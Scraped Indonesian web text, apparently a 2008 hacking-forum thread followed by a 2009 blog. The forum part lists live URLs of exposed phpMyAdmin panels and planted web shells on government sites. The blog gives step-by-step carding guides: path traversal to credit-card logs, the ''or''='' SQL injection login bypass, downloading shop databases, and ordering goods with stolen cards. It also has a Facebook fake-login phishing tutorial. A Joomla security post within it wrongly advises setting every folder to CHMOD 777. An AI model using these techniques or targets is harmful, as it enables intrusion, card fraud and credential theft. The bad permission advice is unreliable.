harus disesuaikan biar bisa aktif, yaitu ganti `h++p://127.0.0.1/mysql' menjadi `h++p://kanreg5bkn.jakarta.go.id/phpmyadmin/'. informasi servernya ada di sini: http://kanreg5bkn.jakarta.go.id/phpmyadmin/sql.php?lang=en&server=1&db=mysql&sql _query=SHOW+VARIABLES&goto=main.php sedangkan yang ini URL mainpage nya http://kanreg5bkn.jakarta.go.id/phpmyadmin/main.php?lang=en&server=1 informasi user priv http://kanreg5bkn.jakarta.go.id/phpmyadmin/user_details.php?lang=en&server=1&db=m ysql&table=user disclaimer: for educational purpose only cyberpunk 5th July 2008, 00:04 situs malaysia :D http://pmid.com.my/phpmyadmin/ disclaimer: for educational purpose only rinoboy
7th July 2008, 09:29 masih, asli ! udah beberapa hari ga dirubah-rubah :getok::getok::getok: kasian .......:getok::getok: smp skrg aja pass-nya gak d rubah jg :getok: :getok: jangan2 adminnya dah pindah kalee,trus web-nya dah gk d urusin deh common|people 9th July 2008, 15:05 Lagi ni.... http://noc.pemkot-malang.go.id/iklan/admin/index.php common|people 9th July 2008, 15:09 Yang ini serem bener... http://www.deptan.go.id/news/admin/info/x99.php aerialsky 9th July 2008, 15:19 Yang ini serem bener... http://www.deptan.go.id/news/admin/info/x99.php Wah parah... jangan2 itu jebakan lagiii...http://i237.photobucket.com/albums/ff133/onionethan/onion_Emoticons/031_.gif egint 9th July 2008, 16:46 http://www.deptan.go.id/news/admin/info/x99.php gileee.... pke injecT php... Bagooss..bagoss..bagoss.. :clap::clap::clap::clap: cyberpunk 9th July 2008, 21:39 wow, pelajarannya dah sampai shell ternyata :D ( disclaimer: for educational purpose only ) http://www.lapan.go.id/doc_news/f.jpg.php @common|people: mungkin ada baiknya klo pake tag code bro, biar ga jadi active hyperlink (cmiiw) common|people 10th July 2008, 07:59
wow, pelajarannya dah sampai shell ternyata :D ( disclaimer: for educational purpose only ) http://www.lapan.go.id/doc_news/f.jpg.php @common|people: mungkin ada baiknya klo pake tag code bro, biar ga jadi active hyperlink (cmiiw) hehehe.. iya bro maap lupa... :cheers: awans 10th July 2008, 11:27 wow, pelajarannya dah sampai shell ternyata :D ( disclaimer: for educational purpose only ) http://www.lapan.go.id/doc_news/f.jpg.php @common|people: mungkin ada baiknya klo pake tag code bro, biar ga jadi active hyperlink (cmiiw) Weq .. Belajar kok terima Order ¿ ... :getok: Mbok yah di sekolah belajarnya ... ya tho ¿ Ini piye Guru neee .... mbok ya punya murid mosok bisa keluyuran selama jam belajar :lol: :lol: rinoboy 11th July 2008, 09:09 tambah beberapa lagi nih.....btw,sori klo repost http://www.siil.com.mx/car/admin.php http://eudesejo.com/laerte/admin.php egint 11th July 2008, 09:21 GOOGLE inurl:"/phpmyadmin/index.php?db=" anehh d... koq msi banyak yang kebuka gt yaa??:getok: trus banyak jg yg default password... exmpl : user: root 'n blank or no password... :speachless: :piss: reseh 11th July 2008, 09:52 hmm mata kuliah nya belum sampai ke injection ya..cuma explorer bug php dan mysql atau joomla dkk saja, cukup sebatas itu, jangan explorer how you can touch sebab
semakin banyak yang tahu semakin banyak yang mengakibatkan kekacauan ok bro keep fight with a high class rinoboy 11th July 2008, 10:15 GOOGLE inurl:"/phpmyadmin/index.php?db=" anehh d... koq msi banyak yang kebuka gt yaa??:getok: trus banyak jg yg default password... exmpl : user: root 'n blank or no password... :speachless: :piss: gileee.....banyak bgt yg msh d buka sm adminnya egint 11th July 2008, 11:18 itu adminya ngsal kalee yg kebuka tuh... cm asal jadi doank,,, :p Dear_diary 13th July 2008, 14:27 tapi ini jadi pelajaran juja bwat kita2, jangan asal jadi.. masa di bayar tapi kita kerja asal2anhttp://i237.photobucket.com/albums/ff133/onionethan/onion_Emoticons/071_.gif rinoboy 13th July 2008, 16:05 tapi ini jadi pelajaran juja bwat kita2, jangan asal jadi.. masa di bayar tapi kita kerja asal2anhttp://i237.photobucket.com/albums/ff133/onionethan/onion_Emoticons/071_.gif :iagree::iagree: anto012 28th August 2008, 15:26 http://tsm.co.id/deperindag/cgi-bin/ ada yg bs masukkin script cgi-bin nya??? :D ini link script nya (http://www.2shared.com/file/3835723/285d0888/includes.html)
tar ektensi nya ganti .pl klo ngga tuh masukkin R57 / C99 aja.. mayan kan bs dpt shell nya... buat maen2.. ihihih anto012 28th August 2008, 15:34 http://forum.detikinet.com/attachment.php?attachmentid=570&stc=1&d=1214926474 deface apa gak ya :D depes aja om dead... :iagree: :cheers: tambahan.. sampe skrg kok masih bs di buka ya tu website???? wayah.. admin liburan ya??? kok ngga pulang2 vBulletin® v3.6
SELAMAT DATANG SEMUANYA diozip on June 21st, 2009 Jangan basa basi untuk bergabung disini… berikan saran,comment & pencerahan yang membangun Tags: anda tidak akan menyesal info 2 Comments » Jun 21
maling dari internet yok…. diozip on June 21st, 2009 klo km berhasil jgn sering yah.. Hallow kawan² semua, tidakkah anda tahu seberapa mudahkah anda melakukan hal ini. Ini hanya informasi, namun kita perlu untuk mengetahuinya. Beberapa yang biasa dilakukan didunia carding ini. Lets Begin - Just For Share! CGI Store Log
Disini kamu musti usaha sendiri mencari target nya. Langkah-langkah nya : 1. http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm 2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi http://www.cashwells.com/cgi-bin/store/index.cgi?page= 3. Masukkan file ini di belakang situs tadi : ../admin/files/order.log Misal nya http://www.cashwells.com/cgibin/store/index.cgi?page=../admin/files/order.log 4. Maka yang keluar di situs itu adalah nomor CC (credit card). Admin Take Over Disini kamu musti usaha sendiri mencari target nya. Langkah-langkah nya : 1. http://www.partsupply.in.th/shopadmin.asp 2. Langkah selanjutnya gunakan teknik SQL Injection user : ‘or”=’ pass : ‘or”=’ 3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain. Database Downloadable Disini kamu musti usaha sendiri mencari target nya. Langkah-langkah nya : 1. http://www.youngsliquors.com/winestore/shopadmin.asp 2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi http://www.youngsliquors.com/winestore/ 3. Masukkan file ini di belakang situs tadi :
shopdbtest.asp Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp 4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation contoh : xDatabase : shopping300 xDatabase :../../../../www/youngsliquors/5498761211 5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi : http://www.youngsliquors.com/winestore/shopping300.mdb 6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access. Metacart Disini kamu musti usaha sendiri mencari target nya. Langkah-langkah nya : 1. http://www.imagexpres.com/metacart/moreinfo.asp 2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi http://www.imagexpres.com/metacart/ 3. Masukkan file ini di belakang situs tadi : database/metacart.mdb Misal nya http://www.imagexpres.com/metacart/database/metacart.mdb 6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access. PDshopPro Shopping Cart Disini kamu musti usaha sendiri mencari target nya. Langkah-langkah nya : 1. http://www.kaskus.us/shop/category.asp?catid=4 2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi http://www.kaskus.us 3. Masukkan file ini di belakang situs tadi :
admin/dbsetup.asp Misal nya http://www.kaskus.us/admin/dbsetup.asp 4. Maka yang keluar di situs target adalah : Your Database Type : Microsoft Access Your Connection String : Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb; Current Status : Connection to Database OK. Database Primary ’setup’ Table Found! Database permissions OK! 5. Skrg utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah url/browsing nya menjadi : http://www.kaskus.us/data/pdshoppro.mdb 6. Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access. Cara Order Barang Sebelum melakukan order barang, kamu musti mempunyai seorang teman di luar negeri (misalnya USA) karna kita akan menggunakan alamat teman kita. Jgn harap bisa order ke Indonesia karna Indonesia termasuk dalam daftar “Black List Order”. Apabila kamu order barang menggunakan CC (Credit Card) org/pemiliknya asal USA maka sebelum order barang, gunakan proxy USA. Begitu pula sebaliknya jika CC org/pemiliknya asal Inggris maka gunakan proxy UK. 1. Order sebuah Laptop di sebuah situs, misal nya seperti di bawah ini. Lalu klik tab “Add to Cart”
2. Kemudian masukkan nomor CDW (liat kolom CDW) ke kolom “QuickCart”. Lalu klik tab “Continue to Checkout”
3. Karna kamu Costumer baru, klik tab “Create Account”
4. Isilah data-data teman kamu (data di bawah ini adalah palsu).
5. Isi lagi data-data teman kamu (data di bawah ini adalah palsu).
6. Pilih salah satu “Shipping Method” nya.
7. Masukkan data CC (Credit Card) yg kamu dapati dari situs atau teman.
8. Perhatikan “Shipping Adress” nya. Laptop yg kita beli akan di kirim ke alamat teman kita (data di bawah ini adalah palsu).
9. Perhatikan lagi “Shipping Adress” nya (data di bawah ini adalah palsu).
10. Skrg kamu tinggal menunggu kabar dari teman kamu yg di luar negeri (USA) via email/telepon. Contoh hasil hasil Tracking Order: Thank you for your order. (Order Number: 20081221000XX) Payment is now complete. Order Number: 20081221000XX Total Price: $1153.00 Products will be sent as soon as dispatch preparations are complete. We look forward to serving you again. ==================================== Ini hanya sebuah informasi yang perlu anda ketahui! Source from: jambihackerlink[dot]googlepages[dot]com ==================================== Jangan lupa baca juga: http://www.binushacker.net/carding-tutorial-unrestricted-information.html Tags: new info 1 Comment » Jun 21
Hidup Mahasiswa Indonesia..!!! diozip on June 21st, 2009
Saya ingin memberikan kejutan kepada dunia luar bersama teman-teman semua SELURUH MAHASISWA Indonesia khususnya mahasiswa UPIYPTK … Tags: teruskan.. TUJUAN BLOG INI No comments » Jun 21
cara hacker facebook diozip on June 21st, 2009 Hello semua, Hack Facebook Dengan Fake Login? Kenapa Tidak… Jangan lupa sediain Hosting / Free Hosting untuk naruh script yang mau kita buat fake login lokasinya nanti. Jangan sampe lupa, karena itu hal yang paling wajib dilakukan! Oke lanjut, mantapin juga dah. Perhatikan Baik² Dan Lakukan Dengan Benar Menurut Petunjuk Dibawah Ini. Jangan Sampe Ada Kekeliruan Sedikitpun! Berikut ini adalah ulasannya: 1. Pertama, bikin dulu sebuah file di hosting tempat anda mau bikin fake login dengan filetype: html. Kemudian kasi nama: “index.html”, sehingga di contoh URL Web adalah: http://www.hostingloedisini.com/facebook/index.html Bikin Code Sesuai Dengan Contoh Script Dibawah Ini: Scriptcode pada no 1: Klick Disini Untuk Lihat Scriptnya 2. Buat file logs.php di hostingan lo sendiri, contoh http://www.hostingloedisini.com/facebook/logs.php di bawah ini script nya.
Scriptcode pada no 2: Klick Disini Untuk Lihat Scriptnya 3. Buatlah file kosong yg berformat txt dengan nama: logs.txt - jadi URLnya jadi: http://www.hostingloedisini.com/facebook/logs.txt 4. Ini wajib dan harus dilakukan! Jangan lupa change mode semua filenya, sehingga permissionnya menjadi: 777 ( chmod + 777). Chmod 777 artinya dimana semua file dapat dibaca (r), dapat ditulis(w), dan dapat di exekusi(x). Jadi chmod 777 adalah untuk merubah file agar file tersebut dapat di eksekusi oleh User, Groups & Other. Hasil set file permission 777 adalah (rwxrwxrwx). 5. Kemudian sebarkan URL yang telah loe buat, misal: “http://www.hostingloedisini.com/facebook/” dengan sesama user difacebook, iklan, atau spam lewat email sebanyak banyaknya. Bisa juga merajuk kepada cewe cewe / cowo cowo yang loe suka supaya klik tu login. Dijamin mantaf klo bisa dapetin username + loginnya! 6. Untuk melihat hasil login Username dan Passwordnya silakan buka file di logs.txt nya, nah klo ada username email beserta passwordnya. Brarti anda telah dapet login ntuh. Contoh ujicoba aplikasi websitenya disini: http://www.hibliz.com/media/facebook/index.html Selamat Mencoba, Semoga Berhasil.. Dan buat para Facebook’ers mania, oh ya, ni skalian gw kasi tips supaya hati hati & biar gak kna Fake Login: 1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com 2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan username dan password kita. 3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah. Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs -> Accessories -> Accessibility -> ‘On-Screen Keyboard’ Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files -> Accessories -> Accessibility -> ‘On-Screen Keyboard’ 4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak “Remember me” pada saat login, karena hal itu dapat menyimpan username dan password di komputer tersebut. Kecuali memakai komputer pribadi.
5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. Kekekeke.. cara ngehack 2 Comments » Jun 21
Lima Jurus Hacker Membobol Situs JOOMLA diozip on June 21st, 2009 Menjadi site administrator Joomla, banyak suka dan dukanya. Salah satunya adalah situs diusili oleh orang lain. Menangani situs joomla jumlahnya sudah seratusan, ternyata menyisakan pengalaman pahit. Ada rasa takut, kesal, sedih, kecewa campur aduk kayak semen. Apalagi kalau mengalami Joomla attack. Ada sekitar sepuluh situs yang diobrakabrik. Lima tewas di-deface, 3 abis disusupi spam dan sisanya dikirimi sampah bot-shell. Yang mengenaskan adalah di deface. Malu sama BOS,hiks :(. Yang diserang adalah situs yang memiliki pagerank tertinggi dan open security. Semakin banyak backdoor yang terbuka, maka situs akan populer dibajak hacker. Sekali dibajak akan diworo-woro ke IRC room, untuk diperkosa rame-rame. Habislah sudah situs joomla merana? Kok bisa? Apa sih yang tak bisa di dunia ini? Semuanya saling berlawanan. Ada hitam ada putih. Ada baik ada Jahat. Ada FPI ada AKKBB. Ada Islam bener ada AHMADIYAH. Ada Islam benar ada JIL. Semuanya saling melengkapi. Kembali ke topik. Kenapa situs Joomla dihack? Karena hacker tahu kelemahan situs Joomla. Bagaimana hackers menyerang situs Joomla? Inilah jawabannya. Para hacker menggunakan lima jurus (pertama) untuk menumbangkan situs Joomla. Lima jurus ini merupakan hasil telusuran, diskusi dan pengalaman pribadi dalam mengelola situs admin. Jadi saya mengundang anda untuk memberikan komentar, kritik dan saran bila jurus yang paparkan ini adalah palsu. Para hackers Joomla dalam menyiapkan serangan ke situs berbasis Joomla akan beberapa strategi. Satu strategi awal dalam menyerang adalah menggunakan Lima jurus. Kelima jurus itu terdiri dari yaitu : 1. Versi Joomla yang digunakan 2. Hostingnya dimana? Jenis hostingnya seperti apa? 3. Jenis Plugin/Extensions yang diinstall 4. File dan folder permissions 5. Ranking situs 6. Jenis situs Biar lebih mantap dan renyah dinikmati, saya akan membeberkan jurus-jurus mematikan ini pada anda. Mari mas..!
1. Versi Joomla yang digunakan Semakin lama versi Joomla yang anda gunakan, anda maka semakin banyak lubang kelemahan (vulnerabilities) situs anda. Setiap detik laporan situs Joomla dihack banyak sekali. Laporan tentang hacking itu lalu dilaporkan dan langsung ditambal (patch). Pada Joomla yang sudah di-patch, maka akan muncul versi Joomla terbaru. Itu artinya Kodeskrip joomla anda harus di update. Anda cukup download bagian script yang akan ditambal. Cukup copy-paste, maka patching sudah selesai. Tapiiiii. Tidak semua orang peduli pada isu ini. Malas dan bosan. Saya juga sudah pernah mengalami ini karena harus menangani situs Joomla yang terlalu banyak. Tapi kalo cuma satu doang mungkin gak masalah. Tapi kalau banyak, penyakit bosan dan CAPEK DEh melanda, maka updating ditinggalkan. Jangan diikuti sifat ini. Karena kalau sudah dibajak, maka anda akan kerja bakti selama seminggu untuk memulai dari awal lagi membangun situs. CAPEK, dehh 2. Hostingnya dimana? Jenis hostingnya seperti apa? Bila ada ISP hosting yang tidak aman, para hackers menyusup di tempat tersebut. Pada beberapa tempat hosting malah jadi sarang penyamun para hackers dalam mencuri data dan menghacking situs. Kerja mereka rapi. Mereka seperi sindikat dan mafia. Mereka sengaja menyediakan jasa hosting murah hanya untuk menjebak client. Hati-hati juga pada free hosting. Tak ada jaminan bahwa situs anda aman. Jadi berhati-hatilah. Tapi saya pernah punya client yang hosting di tempat murah (an) namun manajeman sekuritinya amburadul. Untuk mencirikannya mudah saja. Pertama, biasanya situs ISPnya tidak profesional. Harganya murah (an) banget. Secara logis susah diterima dalam hitungan bisnis. Jadi ada yang dikorbankan. Supportnya kacau dan minim. Sakit hati dan kesal. Kalau ada kesalahan, client yang disalahkan. Site-adminnya kadang-kadang sok tau. Kalau mau detail silakan mampir ke webhostingtalk atau milis web hosting di yahoogroups. Jadi berhati-hatilah dalam memilih hosting untuk situs Joomla anda. Kalau system keamanan dan support meragukan, cepat-cepatlah anda berpindah. Iklaskan uang anda, daripada anda kehilangan 100 kali lipat nantinya. Nanti akan saya bahas topik memilih hosting yang baik dan benar untuk situs Joomla. Semoga dapat sponsor 3. Jenis Plugin/Extensions yang diinstall Lobang terbesar penyerangan situs Joomla ada di sini. Semakin banyak yang terinstall plugin/extensions disitus Joomla anda, semakin besar peluang serangan yang dilancarkan. Banyak programmer berhati jahat yang mengubah atau memalsu skrip plugin/extensions Joomla. Hal itu mudah mereka lakukan. Membuat skrip plugin/extensions Joomla bagi programmer merupakan makanan sehari-hari. Para programmer jahat ini juga sering menyusupkan skrip plugin/extensions ke forum joomla untuk didownload secara gratis. Jadi berhati-hatilah.
4. File dan folder permissions Ini titik kelemahan yang mudah ditemukan dengan bantuan C99 shell atau php shell. Bila ditemukan banyak File dan folder permissions terbuka (666 atau 777) maka kiamat akan tiba. Perbaikilah CHMOD dengan JoomlaXplorer. Yang default terbuka adalah folder media dan images. Karena memang terbuka untuk umum. Tapi kalau tidak perlu mohon ditutup saja. Karena ini adalah pintu utama menghacking situs anda. Kalau situs anda untuk perusahaan, korporat, yayasan, kelembagaan, lebih baik dimatikan saja fitur user registered berikut folder permissionsnya. Ubah semua CHMOD folder menjadi 777. 5. Ranking situs Semakin tinggi sebuah pohon, maka semakin kencang angin yang meniupnya. Semakin tinggi rangking situs anda di google, yahoo dan alexa, maka semakin besar situs anda porak-poranda. Menggunakan google, situs anda akan ada diurutan pertama saat akan diserang. Karena situs anda sudah populer. Para hackers tidak punya belas kasih. Pokoknya, HAJAR BLEH. cara ngehack No comments » Jun 21
situs diozip on June 21st, 2009 Mungkin cara paling mudah untuk mulai belajar teknik hacking adalah mengunjungi situs hacking berbahasa Indonesia, daripada yang berbahasa Inggris. situs yang ada diperlihatkan disini, yaitu: http://www.k-elektronikorg (Kecoa Elektronik) http://www.hackerlink.or.id etc, silahkan share u/ semua yang tau.. okey info No comments » Jun 21
motivasi